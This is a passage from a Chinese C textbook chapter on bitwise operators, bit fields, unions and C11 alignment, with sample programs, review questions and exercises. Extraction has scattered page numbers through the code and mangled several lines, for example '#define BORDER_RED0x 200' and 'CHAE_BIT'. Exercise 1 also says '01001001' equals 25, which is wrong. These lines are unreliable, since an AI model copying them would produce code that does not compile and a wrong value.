show_bstr(bin_str); putchar('\n'); } puts("Bye!"); return 0; } char * itobs(int n, char * ps) { int i; const static int size = CHAR_BIT * sizeof(int); for (i = size - 1; i >= 0; i--, n >>= 1) ps[i] = (01 & n) + '0'; ps[size] = '\0'; return ps; } /*4位一组显示二进制字符串 */ void show_bstr(const char * str) { 1151 int i = 0; while (str[i]) /* 不是一个空字符 */ { putchar(str[i]); if (++i % 4 == 0 && str[i]) putchar(' '); } } 程序清单15.1使用limits.h中的CHAR_BIT宏,该宏表示char中的位数。 sizeof运算符返回char的大小,所以表达式CHAE_BIT * sizeof(int)表示int类型 的位数。bin_str数组的元素个数是CHAE_BIT * sizeof(int) + 1,留出一个位置 给末尾的空字符。 itobs()函数返回的地址与传入的地址相同,可以把该函数作为printf()的 参数。在该函数中,首次执行for循环时,对01 & n求值。01是一个八进制形 式的掩码,该掩码除0号位是1之外,其他所有位都为0。因此,01 & n就是n 最后一位的值。该值为0或1。但是对数组而言,需要的是字符'0'或字符'1'。 该值加上'0'即可完成这种转换(假设按顺序编码的数字,如 ASCII)。其结 果存放在数组中倒数第2个元素中(最后一个元素用来存放空字符)。 顺带一提,用1 & n或01 & n都可以。我们用八进制1而不是十进制1,只 是为了更接近计算机的表达方式。 然后,循环执行i--和n >>= 1。i--移动到数组的前一个元素,n >>= 1使n 中的所有位向右移动一个位置。进入下一轮迭代时,循环中处理的是n中新 的最右端的值。然后,把该值储存在倒数第3个元素中,以此类推。itobs() 函数用这种方式从右往左填充数组。 1152 可以使用printf()或puts()函数显示最终的字符串,但是程序清单15.1中定 义了show_bstr()函数,以4位一组打印字符串,方便阅读。 下面的该程序的运行示例: Enter integers and see them in binary. Non-numeric input terminates program. 7 7 is 0000 0000 0000 0000 0000 0000 0000 0111 2013 2013 is 0000 0000 0000 0000 0000 0111 1101 1101 -1 -1 is 1111 1111 1111 1111 1111 1111 1111 1111 32123 32123 is 0000 0000 0000 0000 0111 1101 0111 1011 q Bye! 15.3.9 另一个例子 我们来看另一个例子。这次要编写的函数用于切换一个值中的后 n 位, 待处理值和 n 都是函数的参数。 ~运算符切换一个字节的所有位,而不是选定的少数位。但是,^运算 符(按位异或)可用于切换单个位。假设创建了一个掩码,把后n位设置为 1153 1,其余位设置为0。然后使用^组合掩码和待切换的值便可切换该值的最后n 位,而且其他位不变。方法如下: int invert_end(int num, int bits) { int mask = 0; int bitval = 1; while (bits–– > 0) { mask |= bitval; bitval <<= 1; } return num ^ mask; } while循环用于创建所需的掩码。最初,mask的所有位都为0。第1轮循 环将mask的0号位设置为1。然后第2轮循环将mask的1号位设置为1,以此类 推。循环bits次,mask的后bits位就都被设置为1。最后,num ^ mask运算即得 所需的结果。 我们把这个函数放入前面的程序中,测试该函数。如程序清单15.2所 示。 程序清单15.2 invert4.c程序 /* invert4.c -- 使用位操作显示二进制 */ 1154 #include <stdio.h> #include <limits.h> char * itobs(int, char *); void show_bstr(const char *); int invert_end(int num, int bits); int main(void) { char bin_str[CHAR_BIT * sizeof(int) + 1]; int number; puts("Enter integers and see them in binary."); puts("Non-numeric input terminates program."); while (scanf("%d", &number) == 1) { itobs(number, bin_str); printf("%d is\n", number); show_bstr(bin_str); putchar('\n'); number = invert_end(number, 4); printf("Inverting the last 4 bits gives\n"); 1155 show_bstr(itobs(number, bin_str)); putchar('\n'); } puts("Bye!"); return 0; } char * itobs(int n, char * ps) { int i; const static int size = CHAR_BIT * sizeof(int); for (i = size - 1; i >= 0; i--, n >>= 1) ps[i] = (01 & n) + '0'; ps[size] = '\0'; return ps; } /* 以4位为一组,显示二进制字符串 */ void show_bstr(const char * str) { int i = 0; 1156 while (str[i]) /* 不是空字符 */ { putchar(str[i]); if (++i % 4 == 0 && str[i]) putchar(' '); } } int invert_end(int num, int bits) { int mask = 0; int bitval = 1; while (bits-- > 0) { mask |= bitval; bitval <<= 1; } return num ^ mask; } 下面是该程序的一个运行示例: 1157 Enter integers and see them in binary. Non-numeric input terminates program. 7 7 is 0000 0000 0000 0000 0000 0000 0000 0111 Inverting the last 4 bits gives 0000 0000 0000 0000 0000 0000 0000 1000 12541 12541 is 0000 0000 0000 0000 0011 0000 1111 1101 Inverting the last 4 bits gives 0000 0000 0000 0000 0011 0000 1111 0010 q Bye! 1158 15.4 位字段 操控位的第2种方法是位字段(bit field)。位字段是一个signed int或 unsigned int类型变量中的一组相邻的位(C99和C11新增了_Bool类型的位字 段)。位字段通过一个结构声明来建立,该结构声明为每个字段提供标签, 并确定该字段的宽度。例如,下面的声明建立了一个4个1位的字段: struct { unsigned int autfd : 1; unsigned int bldfc : 1; unsigned int undln : 1; unsigned int itals : 1; } prnt; 根据该声明,prnt包含4个1位的字段。现在,可以通过普通的结构成员 运算符(.)单独给这些字段赋值: prnt.itals = 0; prnt.undln = 1; 由于每个字段恰好为1位,所以只能为其赋值1或0。变量prnt被储存在 int大小的内存单元中,但是在本例中只使用了其中的4位。 带有位字段的结构提供一种记录设置的方便途径。许多设置(如,字体 的粗体或斜体)就是简单的二选一。例如,开或关、真或假。如果只需要使 用 1 位,就不需要使用整个变量。内含位字段的结构允许在一个存储单元中 储存多个设置。 有时,某些设置也有多个选择,因此需要多位来表示。这没问题,字段 1159 不限制 1 位大小。可以使用如下的代码: struct { unsigned int code1 : 2; unsigned int code2 : 2; unsigned int code3 : 8; } prcode; 以上代码创建了两个2位的字段和一个8位的字段。可以这样赋值: prcode.code1 = 0; prcode.code2 = 3; prcode.code3 = 102; 但是,要确保所赋的值不超出字段可容纳的范围。 如果声明的总位数超过了一个unsigned int类型的大小会怎样?会用到下 一个unsigned int类型的存储位置。一个字段不允许跨越两个unsigned int之间 的边界。编译器会自动移动跨界的字段,保持unsigned int的边界对齐。一旦 发生这种情况,第1个unsigned int中会留下一个未命名的“洞”。 可以用未命名的字段宽度“填充”未命名的“洞”。使用一个宽度为0的未 命名字段迫使下一个字段与下一个整数对齐: struct { unsigned int field1  : 1 ; unsigned int      : 2 ; 1160 unsigned int field2  : 1 ; unsigned int      : 0 ; unsigned int field3  : 1 ; } stuff; 这里,在stuff.field1和stuff.field2之间,有一个2位的空隙;stuff.field3将 储存在下一个unsigned int中。 字段储存在一个int中的顺序取决于机器。在有些机器上,存储的顺序是 从左往右,而在另一些机器上,是从右往左。另外,不同的机器中两个字段 边界的位置也有区别。由于这些原因,位字段通常都不容易移植。尽管如 此,有些情况却要用到这种不可移植的特性。例如,以特定硬件设备所用的 形式储存数据。 15.4.1 位字段示例 通常,把位字段作为一种更紧凑储存数据的方式。例如,假设要在屏幕 上表示一个方框的属性。为简化问题,我们假设方框具有如下属性: 方框是透明的或不透明的; 方框的填充色选自以下调色板:黑色、红色、绿色、黄色、蓝色、紫 色、青色或白色; 边框可见或隐藏; 边框颜色与填充色使用相同的调色板; 边框可以使用实线、点线或虚线样式。 可以使用单独的变量或全长(full-sized)结构成员来表示每个属性,但 是这样做有些浪费位。例如,只需1位即可表示方框是透明还是不透明;只 1161 需1位即可表示边框是显示还是隐藏。8种颜色可以用3位单元的8个可能的值 来表示,而3种边框样式也只需2位单元即可表示。总共10位就足够表示方框 的5个属性设置。 一种方案是:一个字节储存方框内部(透明和填充色)的属性,一个字 节储存方框边框的属性,每个字节中的空隙用未命名字段填充。struct box_props声明如下: struct box_props { bool opaque         : 1 ; unsigned int fill_color  : 3 ; unsigned int        : 4 ; bool show_border      : 1 ; unsigned int border_color : 3 ; unsigned int border_style : 2 ; unsigned int        : 2 ; }; 加上未命名的字段,该结构共占用 16 位。如果不使用填充,该结构占 用 10 位。但是要记住,C 以unsigned int作为位字段结构的基本布局单元。 因此,即使一个结构唯一的成员是1位字段,该结构的大小也是一个unsigned int类型的大小,unsigned int在我们的系统中是32位。另外,以上代码假设 C99新增的_Bool类型可用,在stdbool.h中,bool是_Bool的别名。 对于opaque成员,1表示方框不透明,0表示透明。show_border成员也 用类似的方法。对于颜色,可以用简单的RGB(即red-green-blue的缩写)表 示。这些颜色都是三原色的混合。显示器通过混合红、绿、蓝像素来产生不 1162 同的颜色。在早期的计算机色彩中,每个像素都可以打开或关闭,所以可以 使用用 1 位来表示三原色中每个二进制颜色的亮度。常用的顺序是,左侧位 表示蓝色亮度、中间位表示绿色亮度、右侧位表示红色亮度。表15.3列出了 这8种可能的组合。fill_color成员和border_color成员可以使用这些组合。最 后,border_style成员可以使用0、1、2来表示实线、点线和虚线样式。 表15.3 简单的颜色表示 程序清单15.3中的程序使用box_props结构,该程序用#define创建供结构 成员使用的符号常量。注意,只打开一位即可表示三原色之一。其他颜色用 三原色的组合来表示。例如,紫色由打开的蓝色位和红色位组成,所以,紫 色可表示为BLUE|RED。 程序清单15.3 fields.c程序 /* fields.c -- 定义并使用字段 */ #include <stdio.h> #include <stdbool.h>  // C99定义了bool、true、false /* 线的样式 */ #define SOLID  0 #define DOTTED 1 #define DASHED 2 1163 /* 三原色 */ #define BLUE  4 #define GREEN  2 #define RED  1 /* 混合色 */ #define BLACK  0 #define YELLOW (RED | GREEN) #define MAGENTA (RED | BLUE) #define CYAN  (GREEN | BLUE) #define WHITE  (RED | GREEN | BLUE) const char * colors[8] = { "black", "red", "green", "yellow", "blue", "magenta", "cyan", "white" }; struct box_props { bool opaque : 1;    // 或者 unsigned int (C99以前) unsigned int fill_color : 3; unsigned int : 4; bool show_border : 1; // 或者 unsigned int (C99以前) unsigned int border_color : 3; unsigned int border_style : 2; 1164 unsigned int : 2; }; void show_settings(const struct box_props * pb); int main(void) { /* 创建并初始化 box_props 结构 */ struct box_props box = { true, YELLOW, true, GREEN, DASHED }; printf("Original box settings:\n"); show_settings(&box); box.opaque = false; box.fill_color = WHITE; box.border_color = MAGENTA; box.border_style = SOLID; printf("\nModified box settings:\n"); show_settings(&box); return 0; } void show_settings(const struct box_props * pb) { 1165 printf("Box is %s.\n", pb->opaque == true ? "opaque" : "transparent"); printf("The fill color is %s.\n", colors[pb->fill_color]); printf("Border %s.\n", pb->show_border == true ? "shown" : "not shown"); printf("The border color is %s.\n", colors[pb->border_color]); printf("The border style is "); switch (pb->border_style) { case SOLID: printf("solid.\n"); break; case DOTTED: printf("dotted.\n"); break; case DASHED: printf("dashed.\n"); break; default:   printf("unknown type.\n"); } } 下面是该程序的输出: Original box settings: Box is opaque. The fill color is yellow. 1166 Border shown. The border color is green. The border style is dashed. Modified box settings: Box is transparent. The fill color is white. Border shown. The border color is magenta. The border style is solid. 该程序要注意几个要点。首先,初始化位字段结构与初始化普通结构的 语法相同: struct box_props box = {YES, YELLOW , YES, GREEN, DASHED}; 类似地,也可以给位字段成员赋值: box.fill_color = WHITE; 另外,switch语句中也可以使用位字段成员,甚至还可以把位字段成员 用作数组的下标: printf("The fill color is %s.\n", colors[pb->fill_color]); 注意,根据 colors 数组的定义,每个索引对应一个表示颜色的字符串, 而每种颜色都把索引值作为该颜色的数值。例如,索引1对应字符串"red", 枚举常量red的值是1。 1167 15.4.2 位字段和按位运算符 在同类型的编程问题中,位字段和按位运算符是两种可替换的方法,用 哪种方法都可以。例如,前面的例子中,使用和unsigned int类型大小相同的 结构储存图形框的信息。也可使用unsigned int变量储存相同的信息。如果不 想用结构成员表示法来访问不同的部分,也可以使用按位运算符来操作。一 般而言,这种方法比较麻烦。接下来,我们来研究这两种方法(程序中使用 了这两种方法,仅为了解释它们的区别,我们并不鼓励这样做)。 可以通过一个联合把结构方法和位方法放在一起。假定声明了 struct box_props 类型,然后这样声明联合: union Views /* 把数据看作结构或unsigned short类型的变量 */ { struct box_props st_view; unsigned short us_view; }; 在某些系统中,unsigned int和box_props类型的结构都占用16 位内存。 但是,在其他系统中(例如我们使用的系统),unsigned int和box_props都是 32位。无论哪种情况,通过联合,都可以使用 st_view 成员把一块内存看作 是一个结构,或者使用 us_view 成员把相同的内存块看作是一个unsigned short。结构的哪一个位字段与unsigned short中的哪一位对应?这取决于实现 和硬件。下面的程序示例假设从字节的低阶位端到高阶位端载入结构。也就 是说,结构中的第 1 个位字段对应计算机字的0号位(为简化起见,图15.3 以16位单元演示了这种情况)。 1168 图15.3 作为整数和结构的联合 程序清单15.4使用Views联合来比较位字段和按位运算符这两种方法。 在该程序中,box是View联合,所以box.st_view是一个使用位字段的 box_props类型的结构,box.us_view把相同的数据看作是一个unsigned short 类型的变量。联合只允许初始化第1 个成员,所以初始化值必须与结构相匹 配。该程序分别通过两个函数显示 box 的属性,一个函数接受一个结构,一 个函数接受一个 unsigned short 类型的值。这两种方法都能访问数据,但是 所用的技术不同。该程序还使用了本章前面定义的itobs()函数,以二进制字 符串形式显示数据,以便读者查看每个位的开闭情况。 程序清单15.4 dualview.c程序 /* dualview.c -- 位字段和按位运算符 */ #include <stdio.h> #include <stdbool.h> 1169 #include <limits.h> /* 位字段符号常量 */ /* 边框线样式  */ #define SOLID   0 #define DOTTED  1 #define DASHED  2 /* 三原色 */ #define BLUE   4 #define GREEN   2 #define RED    1 /* 混合颜色 */ #define BLACK   0 #define YELLOW  (RED | GREEN) #define MAGENTA  (RED | BLUE) #define CYAN   (GREEN | BLUE) #define WHITE   (RED | GREEN | BLUE) /* 按位方法中用到的符号常量 */ #define OPAQUE     0x1 #define FILL_BLUE   0x8 1170 #define FILL_GREEN   0x4 #define FILL_RED    0x2 #define FILL_MASK   0xE #define BORDER     0x100 #define BORDER_BLUE  0x800 #define BORDER_GREEN  0x400 #define BORDER_RED0x 200 #define BORDER_MASK  0xE00 #define B_SOLID    0 #define B_DOTTED    0x1000 #define B_DASHED    0x2000 #define STYLE_MASK0x 3000 const char * colors[8] = { "black", "red", "green", "yellow", "blue", "magenta", "cyan", "white" }; struct box_props { bool opaque         : 1; unsigned int fill_color  : 3; unsigned int        : 4; 1171 bool show_border      : 1; unsigned int border_color : 3; unsigned int border_style : 2; unsigned int        : 2; }; union Views /* 把数据看作结构或unsigned short类型的变量 */ { struct box_props st_view; unsigned short us_view; }; void show_settings(const struct box_props * pb); void show_settings1(unsigned short); char * itobs(int n, char * ps); int main(void) { /* 创建Views联合,并初始化initialize struct box view */ union Views box = { { true, YELLOW, true, GREEN, DASHED } }; char bin_str[8 * sizeof(unsigned int) + 1]; printf("Original box settings:\n"); 1172 show_settings(&box.st_view); printf("\nBox settings using unsigned int view:\n"); show_settings1(box.us_view); printf("bits are %s\n", itobs(box.us_view, bin_str)); box.us_view &= ~FILL_MASK;        /* 把表示填充色的位 清0 */ box.us_view |= (FILL_BLUE | FILL_GREEN);  /* 重置填充色 */ box.us_view ^= OPAQUE;          /* 切换是否透明的位 */ box.us_view |= BORDER_RED;        /* 错误的方法 */ box.us_view &= ~STYLE_MASK;        /* 把样式的位清0 */ box.us_view |= B_DOTTED;         /* 把样式设置为点 */ printf("\nModified box settings:\n"); show_settings(&box.st_view); printf("\nBox settings using unsigned int view:\n"); show_settings1(box.us_view); printf("bits are %s\n", itobs(box.us_view, bin_str)); return 0; 1173 } void show_settings(const struct box_props * pb) { printf("Box is %s.\n", pb->opaque == true ? "opaque" : "transparent"); printf("The fill color is %s.\n", colors[pb->fill_color]); printf("Border %s.\n", pb->show_border == true ? "shown" : "not shown"); printf("The border color is %s.\n", colors[pb->border_color]); printf("The border style is "); switch (pb->border_style) { case SOLID: printf("solid.\n"); break; case DOTTED: printf("dotted.\n"); break; case DASHED: printf("dashed.\n"); break; default:   printf("unknown type.\n"); } } void show_settings1(unsigned short us) 1174 { printf("box is %s.\n", (us & OPAQUE) == OPAQUE ? "opaque" : "transparent"); printf("The fill color is %s.\n", colors[(us >> 1) & 07]); printf("Border %s.\n", (us & BORDER) == BORDER ? "shown" : "not shown"); printf("The border style is "); switch (us & STYLE_MASK) { case B_SOLID : printf("solid.\n"); break; case B_DOTTED : printf("dotted.\n"); break; case B_DASHED : printf("dashed.\n"); break; default    : printf("unknown type.\n"); } printf("The border color is %s.\n", colors[(us >> 9) & 07]); } char * itobs(int n, char * ps) 1175 { int i; const static int size = CHAR_BIT * sizeof(int); for (i = size - 1; i >= 0; i--, n >>= 1) ps[i] = (01 & n) + '0'; ps[size] = '\0'; return ps; } 下面是该程序的输出: Original box settings: Box is opaque. The fill color is yellow. Border shown. The border color is green. The border style is dashed. Box settings using unsigned int view: box is opaque. The fill color is yellow. Border shown. 1176 The border style is dashed. The border color is green. bits are 00000000000000000010010100000111 Modified box settings: Box is transparent. The fill color is cyan. Border shown. The border color is yellow. The border style is dotted. Box settings using unsigned int view: box is transparent. The fill color is cyan. Border not shown. The border style is dotted. The border color is yellow. bits are 00000000000000000001011100001100 这里要讨论几个要点。位字段视图和按位视图的区别是,按位视图需要 位置信息。例如,程序中使用BLUE表示蓝色,该符号常量的数值为4。但 是,由于结构排列数据的方式,实际储存蓝色设置的是3号位(位的编号从0 开始,参见图15.1),而且储存边框为蓝色的设置是11号位。因此,该程序 1177 定义了一些新的符号常量: #define FILL_BLUE   0x8 #define BORDER_BLUE  0x800 这里,0x8是3号位为1时的值,0x800是11号位为1时的值。可以使用第1 个符号常量设置填充色的蓝色位,用第2个符号常量设置边框颜色的蓝色 位。用十六进制记数法更容易看出要设置二进制的哪一位,由于十六进制的 每一位代表二进制的4位,那么0x8的位组合是1000,而0x800的位组合是 10000000000,0x800的位组合比0x8后面多8个0。但是以等价的十进制来看 就没那么明显,0x8是8,0x800是2048。 如果值是2的幂,那么可以使用左移运算符来表示值。例如,可以用下 面的#define分别替换上面的#define: #define FILL_BLUE   1<<3 #define BORDER_BLUE  1<<11 这里,<<的右侧是2的指数,也就是说,0x8是23,0x800是211。同样, 表达式1<<n指的是第n位为1的整数。1<<11是常量表达式,在编译时求值。 可以使用枚举代替#defined创建符号常量。例如,可以这样做: enum { OPAQUE = 0x1, FILL_BLUE = 0x8, FILL_GREEN = 0x4, FILL_RED = 0x2, FILL_MASK = 0xE, BORDER = 0x100, BORDER_BLUE = 0x800, BORDER_GREEN = 0x400, BORDER_RED = 0x200, BORDER_MASK = 0xE00, B_DOTTED = 0x1000, B_DASHED = 0x2000, STYLE_MASK = 0x3000}; 1178 如果不想创建枚举变量,就不用在声明中使用标记。 注意,按位运算符改变设置更加复杂。例如,要设置填充色为青色。只 打开蓝色位和绿色位是不够的: box.us_view |= (FILL_BLUE | FILL_GREEN); /* 重置填充色 */ 问题是该颜色还依赖于红色位的设置。如果已经设置了该位(比如对于 黄色),这行代码保留了红色位的设置,而且还设置了蓝色位和绿色位,结 果是产生白色。解决这个问题最简单的方法是在设置新值前关闭所有的颜色 位。因此,程序中使用了下面两行代码: box.us_view &= ~FILL_MASK;        /* 把表示填充色的位 清0 */ box.us_view |= (FILL_BLUE | FILL_GREEN);  /* 重置填充色 */ 如果不先关闭所有的相关位,程序中演示了这种情况: box.us_view |= BORDER_RED;   /* 错误的方法 */ 因为BORDER_GREEN位已经设置过了,所以结果颜色是 BORDER_GREEN | BORDER_RED,被解释为黄色。 这种情况下,位字段版本更简单: box.st_view.fill_color = CYAN; /*等价的位字段方法 */ 这种方法不用先清空所有的位。而且,使用位字段成员时,可以为边框 和框内填充色使用相同的颜色值。但是用按位运算符的方法则要使用不同的 值(这些值反映实际位的位置)。 其次,比较下面两个打印语句: printf("The border color is %s.\n", colors[pb->border_color]); 1179 printf("The border color is %s.\n", colors[(us >> 9) & 07]); 第1条语句中,表达式pb->border_color的值在0~7的范围内,所以该表 达式可用作colors数组的索引。用按位运算符获得相同的信息更加复杂。一 种方法是使用ui>>9把边框颜色右移至最右端(0号位~2号位),然后把该 值与掩码07组合,关闭除了最右端3位以外所有的位。这样结果也在0~7的 范围内,可作为colors数组的索引。 警告 位字段和位的位置之间的相互对应因实现而异。例如,在早期的 Macintosh PowerPC上运行程序清单15.4,输出如下: Original box settings: Box is opaque. The fill color is yellow. Border shown. The border color is green. The border style is dashed. Box settings using unsigned int view: box is transparent. The fill color is black. Border not shown. The border style is solid. The border color is black. 1180 bits are 10110000101010000000000000000000 Modified box settings: Box is opaque. The fill color is yellow. Border shown. The border color is green. The border style is dashed. Box settings using unsigned int view: box is opaque. The fill color is cyan. Border shown. The border style is dotted. The border color is red. bits are 10110000101010000001001000001101 该输出的二进制位与程序示例15.4不同,Macintosh PowerPC把结构载入 内存的方式不同。特别是,它把第1位字段载入最高阶位,而不是最低阶 位。所以结构表示法储存在前16位(与PC中的顺序不同),而unsigned int表 示法则储存在后16位。因此,对于Macintosh,程序清单15.4中关于位的位置 的假设是错误的,使用按位运算符改变透明设置和填充色设置时,也弄错了 位。 1181 15.5 对齐特性(C11) C11 的对齐特性比用位填充字节更自然,它们还代表了C在处理硬件相 关问题上的能力。在这种上下文中,对齐指的是如何安排对象在内存中的位 置。例如,为了效率最大化,系统可能要把一个 double 类型的值储存在4 字 节内存地址上,但却允许把char储存在任意地址。大部分程序员都对对齐不 以为然。但是,有些情况又受益于对齐控制。例如,把数据从一个硬件位置 转移到另一个位置,或者调用指令同时操作多个数据项。 _Alignof运算符给出一个类型的对齐要求,在关键字_Alignof后面的圆括 号中写上类型名即可: size_t d_align = _Alignof(float); 假设d_align的值是4,意思是float类型对象的对齐要求是4。也就是说, 4是储存该类型值相邻地址的字节数。一般而言,对齐值都应该是2的非负整 数次幂。较大的对齐值被称为stricter或stronger,较小的对齐值被称为 weaker。 可以使用_Alignas 说明符指定一个变量或类型的对齐值。但是,不应该 要求该值小于基本对齐值。例如,如果float类型的对齐要求是4,不要请求 其对齐值是1或2。该说明符用作声明的一部分,说明符后面的圆括号内包含 对齐值或类型: _Alignas(double) char c1; _Alignas(8) char c2; unsigned char _Alignas(long double) c_arr[sizeof(long double)]; 注意 撰写本书时,Clang(3.2版本)要求_Alignas(type)说明符在类型说明符 后面,如上面第3行代码所示。但是,无论_Alignas(type)说明符在类型说明 1182 符的前面还是后面,GCC 4.7.3都能识别,后来Clang 3.3 版本也支持了这两 种顺序。 程序清单15.5中的程序演示了_Alignas和_Alignof的用法。 程序清单15.5 align.c程序 // align.c -- 使用 _Alignof 和 _Alignas (C11) #include <stdio.h> int main(void) { double dx; char ca; char cx; double dz; char cb; char _Alignas(double) cz; printf("char alignment:  %zd\n", _Alignof(char)); printf("double alignment: %zd\n", _Alignof(double)); printf("&dx: %p\n", &dx); printf("&ca: %p\n", &ca); printf("&cx: %p\n", &cx); 1183 printf("&dz: %p\n", &dz); printf("&cb: %p\n", &cb); printf("&cz: %p\n", &cz); return 0; } 该程序的输出如下: char alignment: 1 double alignment: 8 &dx: 0x7fff5fbff660 &ca: 0x7fff5fbff65f &cx: 0x7fff5fbff65e &dz: 0x7fff5fbff650 &cb: 0x7fff5fbff64f &cz: 0x7fff5fbff648 在我们的系统中,double的对齐值是8,这意味着地址的类型对齐可以 被8整除。以0或8结尾的十六进制地址可被8整除。这就是地址常用两个 double类型的变量和char类型的变量cz(该变量是double对齐值)。因为char 的对齐值是1,对于普通的char类型变量,编译器可以使用任何地址。 在程序中包含 stdalign.h 头文件后,就可以把 alignas 和 alignof 分别作为 _Alignas 和_Alignof的别名。这样做可以与C++关键字匹配。 1184 C11在stdlib.h库还添加了一个新的内存分配函数,用于对齐动态分配的 内存。该函数的原型如下: void *aligned_alloc(size_t alignment, size_t size); 第1个参数代表指定的对齐,第2个参数是所需的字节数,其值应是第1 个参数的倍数。与其他内存分配函数一样,要使用free()函数释放之前分配 的内存。 1185 15.6 关键概念 C 区别于许多高级语言的特性之一是访问整数中单独位的能力。该特性 通常是与硬件设备和操作系统交互的关键。 C有两种访问位的方法。一种方法是通过按位运算符,另一种方法是在 结构中创建位字段。 C11新增了检查内存对齐要求的功能,而且可以指定比基本对齐值更大 的对齐值。 通常(但不总是),使用这些特性的程序仅限于特定的硬件平台或操作 系统,而且设计为不可移植的。 1186 15.7 本章小结 计算硬件与二进制记数系统密不可分,因为二进制数的1和0可用于表示 计算机内存和寄存器中位的开闭状态。虽然C不允许以二进制形式书写数 字,但是它识别与二进制相关的八进制和十六进制记数法。正如每个二进制 数字表示1位一样,每个八进制位代表3位,每个十六进制位代表4位。这种 关系使得二进制转为八进制或十六进制较为简单。 C 提供多种按位运算符,之所以称为按位是因为它们单独操作一个值中 的每个位。~运算符将其运算对象的每一位取反,将1转为0,0转为1。按位 与运算符(&)通过两个运算对象形成一个值。如果两运算对象中相同号位 都为1,那么该值中对应的位为1;否则,该位为0。按位或运算符(|)同样 通过两个运算对象形成一个值。如果两运算对象中相同号位有一个为1或都 为1,那么该值中对应的位为1;否则,该位为0。按位异或运算符(^)也有 类似的操作,只有两运算对象中相同号位有一个为1时,结果值中对应的位 才为1。 C还有左移(<<)和右移(>>)运算符。这两个运算符使位组合中的所 有位都向左或向右移动指定数量的位,以形成一个新值。对于左移运算符, 空出的位置设为 0。对于右移运算符,如果是无符号类型的值,空出的位设 为0;如果是有符号类型的值,右移运算符的行为取决于实现。 可以在结构中使用位字段操控一个值中的单独位或多组位。具体细节因 实现而异。 可以使用_Alignas强制执行数据存储区上的对齐要求。 这些位工具帮助C程序处理硬件问题,因此它们通常用于依赖实现的场 合中。 1187 15.8 复习题 复习题的参考答案在附录A中。 1.把下面的十进制转换为二进制: a.3 b.13 c.59 d.119 2.将下面的二进制值转换为十进制、八进制和十六进制的形式: a.00010101 b.01010101 c.01001100 d.10011101 3.对下面的表达式求值,假设每个值都为8位: a.~3 b.3 & 6 c.3 | 6 d.1 | 6 e.3 ^ 6 f.7 >> 1 1188 g.7 << 2 4.对下面的表达式求值,假设每个值都为8位: a.~0 b.!0 c.2 & 4 d.2 && 4 e.2 | 4 f.2 || 4 g.5 << 3 5.因为ASCII码只使用最后7位,所以有时需要用掩码关闭其他位,其相 应的二进制掩码是什么?分别用十进制、八进制和十六进制来表示这个掩 码。 6.程序清单15.2中,可以把下面的代码: while (bits-- > 0) { mask |= bitval; bitval <<= 1; } 替换成: while (bits-- > 0) 1189 { mask += bitval; bitval *= 2; } 程序照常工作。这是否意味着*=2等同于<<=1?+=是否等同于|=? 7.a.Tinkerbell计算机有一个硬件字节可读入程序。该字节包含以下信 息: Tinkerbell和IBM PC一样,从右往左填充结构位字段。创建一个适合存 放这些信息的位字段模板。 b.Klinkerbell与Tinkerbell类似,但是它从左往右填充结构位字段。请为 Klinkerbell创建一个相应的位字段模板。 1190 15.9 编程练习 1.编写一个函数,把二进制字符串转换为一个数值。例如,有下面的语 句: char * pbin = "01001001"; 那么把pbin作为参数传递给该函数后,它应该返回一个int类型的值25。 2.编写一个程序,通过命令行参数读取两个二进制字符串,对这两个二 进制数使用~运算符、&运算符、|运算符和^运算符,并以二进制字符串形 式打印结果(如果无法使用命令行环境,可以通过交互式让程序读取字符 串)。 3.编写一个函数,接受一个 int 类型的参数,并返回该参数中打开位的 数量。在一个程序中测试该函数。 4.编写一个程序,接受两个int类型的参数:一个是值;一个是位的位 置。如果指定位的位置为1,该函数返回1;否则返回0。在一个程序中测试 该函数。 5.编写一个函数,把一个 unsigned int 类型值中的所有位向左旋转指定数 量的位。例如,rotate_l(x, 4)把x中所有位向左移动4个位置,而且从最左端 移出的位会重新出现在右端。也就是说,把高阶位移出的位放入低阶位。在 一个程序中测试该函数。 6.设计一个位字段结构以储存下面的信息。 字体ID:0~255之间的一个数; 字体大小:0~127之间的一个数; 对齐:0~2之间的一个数,表示左对齐、居中、右对齐; 1191 加粗:开(1)或闭(0); 斜体:开(1)或闭(0); 在一个程序中使用该结构来打印字体参数,并使用循环菜单来让用户改 变参数。例如,该程序的一个运行示例如下: 1192 1193 该程序要使用按位与运算符(&)和合适的掩码来把字体ID和字体大小 信息转换到指定的范围内。 7.编写一个与编程练习 6 功能相同的程序,使用 unsigned long 类型的变 量储存字体信息,并且使用按位运算符而不是位成员来管理这些信息。 1194 第16章 C预处理器和C库 本章介绍以下内容: 预处理指令:#define、#include、#ifdef、#else、#endif、#ifndef、#if、 #elif、#line、#error、#pragma 关键字:_Generic、_Noreturn、_Static_assert 函数/宏:sqrt()、atan()、atan2()、exit()、atexit()、assert()、memcpy()、 memmove()、va_start()、va_arg()、va_copy()、va_end() C预处理器的其他功能 通用选择表达式 内联函数 C库概述和一些特殊用途的方便函数 C语言建立在适当的关键字、表达式、语句以及使用它们的规则上。然 而,C标准不仅描述C语言,还描述如何执行C预处理器、C标准库有哪些函 数,以及详述这些函数的工作原理。本章将介绍C预处理器和C库,我们先 从C预处理器开始。 C预处理器在程序执行之前查看程序(故称之为预处理器)。根据程序 中的预处理器指令,预处理器把符号缩写替换成其表示的内容。预处理器可 以包含程序所需的其他文件,可以选择让编译器查看哪些代码。预处理器并 不知道 C。基本上它的工作是把一些文本转换成另外一些文本。这样描述预 处理器无法体现它的真正效用和价值,我们将在本章举例说明。前面的程序 示例中也有很多#define和#include的例子。下面,我们先总结一下已学过的 预处理指令,再介绍一些新的知识点。 1195 16.1 翻译程序的第一步 在预处理之前,编译器必须对该程序进行一些翻译处理。首先,编译器 把源代码中出现的字符映射到源字符集。该过程处理多字节字符和三字符序 列——字符扩展让C更加国际化(详见附录B“参考资料VII,扩展字符支 持”)。 第二,编译器定位每个反斜杠后面跟着换行符的实例,并删除它们。也 就是说,把下面两个物理行(physical line): printf("That's wond\ erful!\n"); 转换成一个逻辑行(logical line): printf("That's wonderful\n!"); 注意,在这种场合中,“换行符”的意思是通过按下Enter键在源代码文件 中换行所生成的字符,而不是指符号表征\n。 由于预处理表达式的长度必须是一个逻辑行,所以这一步为预处理器做 好了准备工作。一个逻辑行可以是多个物理行。 第三,编译器把文本划分成预处理记号序列、空白序列和注释序列(记 号是由空格、制表符或换行符分隔的项,详见16.2.1)。这里要注意的是, 编译器将用一个空格字符替换每一条注释。因此,下面的代码: int/* 这看起来并不像一个空格*/fox; 将变成: int fox; 而且,实现可以用一个空格替换所有的空白字符序列(不包括换行 1196 符)。最后,程序已经准备好进入预处理阶段,预处理器查找一行中以#号 开始的预处理指令。 1197 16.2 